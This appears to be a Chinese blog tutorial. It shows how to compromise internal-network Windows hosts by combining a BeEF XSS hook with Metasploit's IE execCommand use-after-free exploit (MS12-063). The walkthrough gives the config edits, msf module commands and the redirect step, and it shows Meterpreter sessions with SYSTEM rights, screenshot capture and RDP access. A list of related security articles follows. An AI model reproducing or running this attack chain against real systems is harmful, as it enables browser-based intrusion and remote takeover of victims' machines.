metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機

系統(tǒng):KALI
用到的工具:beEF+msf
利用的IE漏洞是:http://www.rapid7.com/db/modules/exploit/windows/browser/ie_execcommand_uaf
MS12-063
AutomaticIE 7 on Windows XP SP3IE 8 on Windows XP SP3IE 7 on Windows VistaIE 8 on Windows VistaIE 8 on Windows 7IE 9 on Windows 7
用到的beef+msf
先配置下:
root@kali:~# cd /usr/share/beef-xss/root@kali:/usr/share/beef-xss# lsbeef beef_key.pem config.yaml db Gemfile modulesbeef_cert.pem bundle core extensions Gemfile.lock
編輯下config.yaml
把metasploit :false改成true
再進入extensions/metasploit/
同樣修改下config.yaml
把host跟callback_host 改成自己的IP 這里是220.128
再改動下custom path:
這樣beef已經(jīng)配置好了。那就運行下metasploit
運行msf后 數(shù)據(jù)庫連接下,不然上線也會沒有提示的。這里的pass 就是extensions/metasploit/config.yaml里面的pass
這樣就沒有什么問題。我們可以先看一下beef.數(shù)據(jù)庫只要連上了就不會出現(xiàn)msf的api錯誤的。
進入beef
賬號密碼beef 配置文件里面有。beef:beef
那beef已經(jīng)都OK了。
現(xiàn)在來搞下選擇下要顯示的頁面:
hook.js 運行beef 顯示出來的。
別忘記運行下apache。
我們再進入msf
use exploit/windows/browser/ie_execcommand_uaf
可以自己根據(jù)自己的要求來選擇。
show options
port可以自已改。
我用xp+ie7
直接訪問下我們的頁面192.168.220.128/xss/
beef就會顯示出來了。
點擊 commands-hookeddomain-REDIRECT BROWSER 讓他重新跳轉(zhuǎn)到我們msf生成的地址上。beef很多功能。
把地址改成192.168.220.128:8080(msf生成的地址)
我們就會看到msf上面已經(jīng)顯示出來了。 回顯了sessions
payload可以自己去改。我使用的meterpreter載荷
執(zhí)行sessions -i
執(zhí)行sessions -i ID號
可以執(zhí)行任意命令已經(jīng)是系統(tǒng)權(quán)限
執(zhí)行下screenshost
meterpreter > screenshot Screenshot saved to: /root/dlsSQBkF.jpeg
就可以看到當前主機的屏幕內(nèi)容。
也可以rdesktop 遠程連接上去。
參數(shù)rdesktop -f ip -u username -p password
這也是一種xss掛馬拿內(nèi)網(wǎng)主機。
注:鄙人每天都在寫一些metasploit的玩法,如果有大神有什么好的方法希望告訴我,我更新在空間,分享給大家。
相關(guān)文章
封UDP的服務(wù)器真的打不了么?封UDP、封海外服務(wù)器
很多游戲服務(wù)器租用的時候會出現(xiàn)一些封UDP的字眼,網(wǎng)上一些文章也說UDP協(xié)議不可靠!為什么要封UDP呢?既然不可靠,為什么有些人還要使用它呢?今天與你們分享一下UDP,希望2024-05-07魔獸世界服務(wù)器被DDoS攻擊怎么辦?DDoS攻擊防御方法
魔獸世界服務(wù)器被攻擊在目前來說也是比較常見的,同行競爭激烈,在官服開放時也遇到過DDOS攻擊,要是飛飛沒記錯是在22年9月14日,從剛開始的身份驗證服務(wù)器出現(xiàn)問題,到確2023-07-17分享五大免費企業(yè)網(wǎng)絡(luò)入侵檢測(IDS)工具
這篇文章主要分享一下五大免費企業(yè)網(wǎng)絡(luò)入侵檢測(IDS)工具,當前企業(yè)對于網(wǎng)絡(luò)安全越來越重視,那么后期可能就需要大家多多關(guān)注一些安全工具的使用于檢測2019-12-01網(wǎng)絡(luò)安全基礎(chǔ)之網(wǎng)絡(luò)協(xié)議與安全威脅的關(guān)系介紹
網(wǎng)絡(luò)協(xié)議是什么呢?網(wǎng)絡(luò)協(xié)議是網(wǎng)絡(luò)中計算機或設(shè)備之間進行通信的一系列規(guī)則集合。本文中小編介紹的是網(wǎng)絡(luò)協(xié)議和安全威脅的關(guān)系,需要的朋友不妨閱讀本文了解一下2019-04-02- DDoS攻擊是由DoS攻擊轉(zhuǎn)化的,這項攻擊的原理以及表現(xiàn)形式是怎樣的呢?要如何的進行防御呢?本文中將會有詳細的介紹,需要的朋友不妨閱讀本文進行參考2019-01-15
基于Web攻擊的方式發(fā)現(xiàn)并攻擊物聯(lián)網(wǎng)設(shè)備介紹
本文中介紹的是基于Web攻擊的方式發(fā)現(xiàn)并攻擊物聯(lián)網(wǎng)設(shè)備,感興趣的朋友不妨閱讀本文進行了解2019-01-11為何黑客要挾制路由器DNS 用戶該怎樣實時發(fā)覺和防備方法
起首說說挾制路由器是什么意思,路由器挾制平日指的是,開啟了無線網(wǎng)絡(luò)功效的無線路由器,攻擊者經(jīng)由過程破解無線暗碼銜接上無線網(wǎng)后,再登錄路由治理界面來節(jié)制全部無線網(wǎng)2018-05-16大勢至共享文件監(jiān)控軟件、共享文件權(quán)限管理軟件主控端與客戶端的連接設(shè)
這篇文章主要介紹了大勢至共享文件監(jiān)控軟件、共享文件權(quán)限管理軟件主控端與客戶端的連接設(shè)置方法詳解,,小編覺得還是挺不錯的,具有一定借鑒價值,下面就來和小編一起看看2018-01-25詳細介紹sd卡加密軟件的選擇以及給sd卡設(shè)置密碼、給sd卡加密
這篇文章主要介紹了詳細介紹sd卡加密軟件的選擇以及給sd卡設(shè)置密碼、給sd卡加密,如何保護sd卡文件的安全,如何給SD卡設(shè)置密碼、如何給SD卡加密,下面就跟小編一起來看看吧2018-01-19server2008共享設(shè)置、服務(wù)器共享文件設(shè)置、服務(wù)器設(shè)置共享文件夾的方法
這篇文章主要介紹了server2008共享設(shè)置、服務(wù)器共享文件設(shè)置、服務(wù)器設(shè)置共享文件夾的方法詳細介紹,保護服務(wù)器共享文件設(shè)置訪問權(quán)限,讓每個部門只訪問自己的共享文件等,2018-01-19